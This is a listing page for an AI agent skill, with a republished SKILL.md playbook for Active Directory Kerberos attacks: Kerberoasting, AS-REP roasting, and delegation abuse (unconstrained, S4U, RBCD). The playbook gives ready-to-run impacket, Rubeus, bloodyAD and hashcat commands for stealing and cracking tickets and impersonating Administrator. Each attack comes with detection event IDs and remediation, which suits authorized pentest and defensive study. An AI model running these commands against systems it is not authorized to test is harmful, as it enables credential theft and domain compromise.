Agent skill

Kerberos Attacks

by ADScanPro in ADScanPro/Claude-AD

Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).

MITAuto-check: notesSecurity

Install Kerberos Attacks

skills CLI
$ npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install ADScanPro/Claude-AD kerberos-attacks --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/kerberos-attacks .claude/skills/kerberos-attacks && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
kerberos-attacks
GitHub stars
209
Token cost
~2.9k tokens
SKILL.md length
1,156 words
Files
1
Skills in repo
7
Repo updated
First seen
Licence
MIT

At a glance

Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).

  • Works in 3 steps: Kerberoasting → AS-REP Roasting → Delegation Abuse
  • The target has SPN-bearing service accounts
  • SKILL.md covers 1. Kerberoasting, 2. AS-REP Roasting, 3. Delegation Abuse and Cross-cutting hardening, plus 1 more section
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md

What it does

Kerberos Attacks is an agent skill from ADScanPro/Claude-AD. Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD). Use when the target has SPN-bearing service accounts, accounts without pre-authentication, or delegation configured on computer/user objects, and you want the exact impacket/Rubeus/bloodyAD command, the hash format and hashcat mode, the Windows Event IDs that fire, and the remediation to write up.

Its SKILL.md is about 2.9k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Red teaming and adversary simulation and Penetration testing. The repository describes itself as: Active Directory pentest methodology for Claude Code: skills, agents and slash commands for internal AD red-team work (Kerberoasting, ADCS ESC1-17, DCSync, ACL abuse, NTLM relay… The licence is MIT.

When your agent uses it

  • The target has SPN-bearing service accounts
  • Accounts without pre-authentication
  • Delegation configured on computer/user objects
  • You want the exact impacket/Rubeus/bloodyAD command

Example prompts

  • “/kerberos-attacks”

Workflow steps

3 steps, taken from the step headings in SKILL.md.

  1. Kerberoasting
  2. AS-REP Roasting
  3. Delegation Abuse

What it can do on your machine

Read from SKILL.md and the folder at commit 73efec5. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • thehacker.recipes

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Kerberos Attacks loads about 2.9k tokens when it runs. Until then it costs about 122 tokens; SKILL.md has 1,156 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~122
When it runs · the whole SKILL.md, loaded when a task matches
~2.9k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: notes

The automated check noted patterns worth knowing about, such as sudo or a known installer.

  • NoteRuns commands with sudoSKILL.md:10
    tickets (`KRB_AP_ERR_SKEW`). Sync with `sudo ntpdate <dc-ip>` or `faketime`.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from ADScanPro/Claude-AD at commit 73efec5, republished under its MIT licence (© ADScanPro). 1,156 words, ~2,865 tokens.

Download SKILL.mdSave it as .claude/skills/kerberos-attacks/SKILL.md (or your agent's skills folder).
name
kerberos-attacks
description
Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD). Use when the target has SPN-bearing service accounts, accounts without pre-authentication, or delegation configured on computer/user objects, and you want the exact impacket/Rubeus/bloodyAD command, the hash format and hashcat mode, the Windows Event IDs that fire, and the remediation to write up.

Kerberos Attacks

Standard-tooling playbook for the four Kerberos abuse families you meet on almost every internal AD engagement. You drive every tool yourself. This skill tells you what each attack is, the exact command, how the loot looks and how to crack it, what the DC logs, and what the remediation write-up should say.

Requirements before you touch these: valid domain credentials (any user is enough for Kerberoasting and delegation reads; AS-REP roasting needs only a username list), correct DNS pointing at the DC, and clock skew under 5 minutes or Kerberos rejects your tickets (KRB_AP_ERR_SKEW). Sync with sudo ntpdate <dc-ip> or faketime.


1. Kerberoasting

MITRE ATT&CK: T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting)

What it is. Any authenticated user can request a service ticket (TGS) for any account that has a Service Principal Name (SPN) set. The TGS is encrypted with the service account's password-derived key. If the DC hands you an RC4 (etype 23) ticket, you crack it offline to recover the account's cleartext password. Service accounts are the target because they often have weak, non-expiring, human-set passwords and elevated rights.

Standard commands.

Request tickets for every kerberoastable account (impacket):

GetUserSPNs.py -request -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123' -outputfile kerb_hashes.txt

Enumerate first without requesting (see who is roastable before making noise):

GetUserSPNs.py -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'

netexec equivalent (also does it in one line):

nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --kerberoasting kerb_hashes.txt

Targeted roast of a single account (quieter, one 4769 instead of dozens):

GetUserSPNs.py -request-user sqlsvc -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'

Hash format + cracking. The loot is a $krb5tgs$ hash. RC4 tickets are hashcat mode 13100; AES256 tickets (etype 18) are mode 19700 and are far slower.

$krb5tgs$23$*sqlsvc$CORP.LOCAL$MSSQLSvc/db01.corp.local*$a1b2...  # RC4, -m 13100
$krb5tgs$18$sqlsvc$CORP.LOCAL$...                                  # AES256, -m 19700
hashcat -m 13100 -a 0 kerb_hashes.txt rockyou.txt --force

Detection (blue-team Event IDs).

  • 4769 (Kerberos service ticket requested) on the DC. The tell is Ticket Encryption Type 0x17 (RC4) when the domain otherwise uses AES, and a single account requesting many distinct service tickets in a short window. Baseline normal 4769 volume first; it is a high-noise event.
  • Microsoft Defender for Identity raises a "Suspected Kerberoasting" alert on this pattern.

Remediation to write up.

  • Use gMSA/dMSA for service accounts: 120-character machine-managed passwords that cannot be cracked.
  • Where a human-set service password is unavoidable, enforce 25+ character passphrases and rotation.
  • Set msDS-SupportedEncryptionTypes to AES-only on service accounts so RC4 tickets are never issued.
  • Remove SPNs from accounts that do not actually run a service.

2. AS-REP Roasting

MITRE ATT&CK: T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)

What it is. Accounts with "Do not require Kerberos preauthentication" set (DONT_REQ_PREAUTH in userAccountControl) will return an AS-REP encrypted with the user's password-derived key to anyone who asks, no credentials needed. Crack it offline for the cleartext. Because it needs no valid domain account, it works from a username list alone.

Standard commands.

Roast every preauth-disabled account (needs a valid credential to read the directory for the list):

GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/svc_user:'Password123' -outputfile asrep_hashes.txt

Unauthenticated, spraying a username wordlist (no credential at all):

GetNPUsers.py -dc-ip 10.0.0.10 -no-pass -usersfile users.txt CORP.LOCAL/ -format hashcat

netexec equivalent:

nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --asreproast asrep_hashes.txt

Hash format + cracking. Loot is a $krb5asrep$ hash, hashcat mode 18200 (RC4).

$krb5asrep$23$user@CORP.LOCAL:a1b2c3...
hashcat -m 18200 -a 0 asrep_hashes.txt rockyou.txt --force

Detection.

  • 4768 (Kerberos authentication ticket / TGT requested) with pre-authentication type 0 and RC4 encryption. Normal Kerberos logons use preauth type 2, so preauth 0 is the signal.
  • Sudden 4768 volume from one source against many accounts = spraying.

Remediation.

  • Remove "Do not require Kerberos preauthentication" from every account that has it (audit userAccountControl for the DONT_REQ_PREAUTH bit, 0x400000).
  • These accounts also need strong passwords in the meantime, since the AS-REP is crackable the instant the flag is set.

3. Delegation Abuse

Kerberos delegation lets a service impersonate a user to a downstream service. Misconfigured, it becomes a privilege-escalation and lateral-movement primitive. Three flavors.

3a. Unconstrained Delegation

MITRE ATT&CK: T1558 (Steal or Forge Kerberos Tickets) / T1550 (Use Alternate Authentication Material)

What it is. A computer or account with TRUSTED_FOR_DELEGATION in userAccountControl caches the full TGT of any user who authenticates to it. Compromise that host, force a privileged account (or a DC's machine account) to authenticate to it (see the coercion skill), and extract the TGT to impersonate that principal anywhere. A DC's TGT means domain compromise.

Find it (BloodHound CE, or LDAP):

nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --trusted-for-delegation
Get-DomainComputer -Unconstrained            # PowerView, on a Windows foothold

Extract cached TGTs from a host you control (impacket, remotely via secretsdump-style flow, or Rubeus on-host):

Rubeus.exe monitor /interval:5 /nowrap          # on the compromised host, watch for inbound TGTs
Rubeus.exe dump /nowrap                          # dump cached tickets

Pair with a coercion (PetitPotam/PrinterBug) to force DC01$ to authenticate to your unconstrained host, then reuse the captured DC TGT.

Detection. 4769/4768 ticket requests tied to the delegation host; anomalous machine-account authentication to a non-DC server (a DC's $ account logging on to a member server is abnormal). Defender for Identity flags unconstrained-delegation exposure.

Remediation. Eliminate unconstrained delegation entirely; migrate to constrained or resource-based. Put sensitive accounts in the Protected Users group and/or mark them "Account is sensitive and cannot be delegated" (NOT_DELEGATED, 0x100000), which prevents their TGT from being cached.

Show full SKILL.md (402 more words)Show less
3b. Constrained Delegation (S4U2Self / S4U2Proxy)

MITRE ATT&CK: T1558.003 area / T1550

What it is. An account configured with msDS-AllowedToDelegateTo (classic constrained delegation) can request a ticket to itself on behalf of any user (S4U2Self) and then forward it to the listed target SPN (S4U2Proxy). If protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION) is set, you can impersonate an arbitrary user, including a Domain Admin, to the target service.

Abuse (impacket getST):

getST.py -spn cifs/fileserver.corp.local -impersonate Administrator \
  -dc-ip 10.0.0.10 CORP.LOCAL/svc_web:'Password123'
export KRB5CCNAME=Administrator.ccache
nxc smb fileserver.corp.local --use-kcache

Find accounts with constrained delegation:

nxc ldap 10.0.0.10 -u svc_user -p 'Password123' --find-delegation

Detection. 4769 for the target SPN where the requesting service is impersonating a different user; unusual S4U2Proxy activity in the DC logs.

Remediation. Restrict msDS-AllowedToDelegateTo to the minimum SPNs. Disable protocol transition unless required. Protect high-value accounts with Protected Users / NOT_DELEGATED.

3c. Resource-Based Constrained Delegation (RBCD)

MITRE ATT&CK: T1550 / T1098 (Account Manipulation)

What it is. The delegation trust lives on the target object, in msDS-AllowedToActOnBehalfOfOtherIdentity. If you can write that attribute on a computer object (via GenericWrite/GenericAll/WriteDACL over it, see the ACL abuse skill), you point it at a computer account you control, then S4U your way to impersonating any user to that target. The classic chain uses MachineAccountQuota (default 10) to add your own computer account first.

Standard chain.

Add a computer account you control (if MachineAccountQuota > 0):

addcomputer.py -computer-name 'EVIL$' -computer-pass 'EvilPass123' \
  -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'

Write the RBCD attribute on the victim computer (bloodyAD):

bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u svc_user -p 'Password123' \
  add rbcd TARGET$ EVIL$

impacket alternative for the write:

rbcd.py -delegate-from 'EVIL$' -delegate-to 'TARGET$' -action write \
  -dc-ip 10.0.0.10 CORP.LOCAL/svc_user:'Password123'

Get the impersonated ticket and use it:

getST.py -spn cifs/target.corp.local -impersonate Administrator \
  -dc-ip 10.0.0.10 'CORP.LOCAL/EVIL$:EvilPass123'
export KRB5CCNAME=Administrator.ccache
nxc smb target.corp.local --use-kcache

Detection.

  • 5136 (a directory object was modified) on the victim computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute; the write is the loud, catchable moment.
  • 4741 (a computer account was created) when a new machine account appears via MachineAccountQuota.
  • 4769 for the target SPN with impersonation.

Remediation.

  • Set MachineAccountQuota to 0 so unprivileged users cannot add computer accounts.
  • Audit and lock down write access to computer objects' DACLs (no non-admin GenericWrite/WriteDACL on machine objects).
  • Alert on any modification of msDS-AllowedToActOnBehalfOfOtherIdentity.
  • Protected Users / NOT_DELEGATED on sensitive accounts blunts the impersonation.

Cross-cutting hardening

  • Force AES across the domain and retire RC4; it kills the fast-crack path for Kerberoasting and AS-REP roasting at once.
  • Machine-managed passwords (gMSA/dMSA) remove the crackable-secret problem for service accounts.
  • Protected Users group + "sensitive and cannot be delegated" on Tier-0 accounts neutralizes most delegation abuse.
  • Baseline 4768/4769 volumes so the RC4/preauth-0 anomalies stand out instead of drowning.

Only run these against systems you are explicitly authorized to test. Use lab or generic values in any write-up, never a client's real SPNs, hostnames, or hashes.


Reference

© ADScanPro, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/kerberos-attacks of ADScanPro/Claude-AD.

Open the folder on GitHubat commit 73efec5

Compare with similar skills

Kerberos Attacks next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Kerberos Attacks compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Kerberos Attacks this skillADScanPro/Claude-AD209—~2.9kAutomated safety check: NotesMIT
Cybersecurityohmyjahh/xquads-squads276—~895Automated safety check: PassMIT
Detecting T1548 Abuse Elevation Control Mechanismmukul975/Anthropic-Cybersecurity-Skills34k—~1.5kAutomated safety check: NotesApache-2.0
Exploiting Vulnerabilities With Metasploit Frameworkmukul975/Anthropic-Cybersecurity-Skills34k—~1.9kAutomated safety check: NotesApache-2.0
Detecting Attacks On Historian Serversmukul975/Anthropic-Cybersecurity-Skills34k—~3kAutomated safety check: PassApache-2.0
Performing Web Application Firewall Bypassmukul975/Anthropic-Cybersecurity-Skills34k—~2.4kAutomated safety check: PassApache-2.0

Similar skills

  • Cybersecurity

    ohmyjahh/xquads-squads

    Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…

    276 GitHub stars~895 tokensUpdated 8 days ago
    SecurityAuto-check passed
  • Detecting T1548 Abuse Elevation Control Mechanism

    mukul975/Anthropic-Cybersecurity-Skills

    Detect abuse of elevation control mechanisms (T1548), including Windows UAC bypass via auto-elevating binaries like fodhelper.exe and Linux sudo/setuid/setgid exploitation, by monitoring registry…

    34k GitHub stars~1.5k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Exploiting Vulnerabilities With Metasploit Framework

    mukul975/Anthropic-Cybersecurity-Skills

    Uses the Metasploit Framework (msfconsole and its exploit, auxiliary, and post-exploitation modules) to validate that identified CVEs and vulnerabilities are actually exploitable, gather…

    34k GitHub stars~1.9k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Detecting Attacks On Historian Servers

    mukul975/Anthropic-Cybersecurity-Skills

    Detect cyber attacks on OT historian servers (OSIsoft PI, Ignition, GE Proficy, Wonderware InSQL) using a Python detector that flags unauthorized queries, data manipulation, and lateral-movement…

    34k GitHub stars~3k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Performing Web Application Firewall Bypass

    mukul975/Anthropic-Cybersecurity-Skills

    Bypasses Web Application Firewall protections using encoding tricks, HTTP method manipulation, parameter pollution, and payload obfuscation to smuggle SQL injection, XSS, and other exploit payloads…

    34k GitHub stars~2.4k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Testing For Business Logic Vulnerabilities

    mukul975/Anthropic-Cybersecurity-Skills

    Manually identifies flaws in application business logic - price manipulation, multi-step workflow bypass, and privilege escalation - by intercepting and modifying requests with Burp Suite, going…

    34k GitHub stars~3.3k tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from ADScanPro/Claude-AD

  • Acl Abuse

    ADScanPro/Claude-AD

    Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…

    209 GitHub stars~2.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Ad Environment Constraints

    ADScanPro/Claude-AD

    Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…

    209 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check: notes
  • Ad Opsec Telemetry

    ADScanPro/Claude-AD

    The telemetry each Active Directory technique generates and what alerts a defender: Kerberoasting produces Event 4769 with RC4 encryption (0x17) and an MDI alert, DCSync produces Event 4662 with the…

    209 GitHub stars~2.4k tokensUpdated 1 mo ago
    Auto-check passed
  • Adcs Attacks

    ADScanPro/Claude-AD

    Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).

    209 GitHub stars~3.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Coercion Ntlm Relay

    ADScanPro/Claude-AD

    Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.

    209 GitHub stars~1.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Compliance Mapping

    ADScanPro/Claude-AD

    A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.

    209 GitHub stars~1.7k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Kerberos Attacks

What does Kerberos Attacks do?

Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD). Kerberos Attacks is an agent skill from ADScanPro/Claude-AD. Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).

When should I use Kerberos Attacks?

Kerberos Attacks fits situations like: the target has SPN-bearing service accounts; accounts without pre-authentication; delegation configured on computer/user objects; you want the exact impacket/Rubeus/bloodyAD command.

How do I install Kerberos Attacks in Claude Code?

Run `npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a claude-code`. Or copy the skill folder (skills/kerberos-attacks in ADScanPro/Claude-AD) into .claude/skills/kerberos-attacks in your project. Claude Code loads it when a task matches its description.

How do I install Kerberos Attacks in Codex?

Run `npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a codex`. Or copy the skill folder (skills/kerberos-attacks in ADScanPro/Claude-AD) into .agents/skills/kerberos-attacks in your project. Codex loads it when a task matches its description.

Can I use Kerberos Attacks in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ADScanPro/Claude-AD --skill kerberos-attacks -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/kerberos-attacks, .gemini/skills/kerberos-attacks, .github/skills/kerberos-attacks and .opencode/skills/kerberos-attacks in your project.

What does Kerberos Attacks need to run?

SKILL.md names no scripts, command-line tools or credentials: Kerberos Attacks is instructions for the agent only.

Does Kerberos Attacks access the network?

SKILL.md names 1 domain. As links in the text: thehacker.recipes. This is read from the text; nothing was executed.

Is Kerberos Attacks safe to install?

Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.

What licence does Kerberos Attacks use?

Kerberos Attacks is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Kerberos Attacks use?

About 2.9k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Kerberos Attacks?

Skills that share tags, products or a category with Kerberos Attacks: Cybersecurity (ohmyjahh/xquads-squads, 276 stars), Detecting T1548 Abuse Elevation Control Mechanism (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Exploiting Vulnerabilities With Metasploit Framework (mukul975/Anthropic-Cybersecurity-Skills, 34k stars) and Detecting Attacks On Historian Servers (mukul975/Anthropic-Cybersecurity-Skills, 34k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Kerberos Attacks?

ADScanPro (a GitHub user) maintains it in ADScanPro/Claude-AD, which has 209 GitHub stars. The repository holds 7 skills in this directory. The repository was last updated on August 24, 2026.

Source: ADScanPro/Claude-AD on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.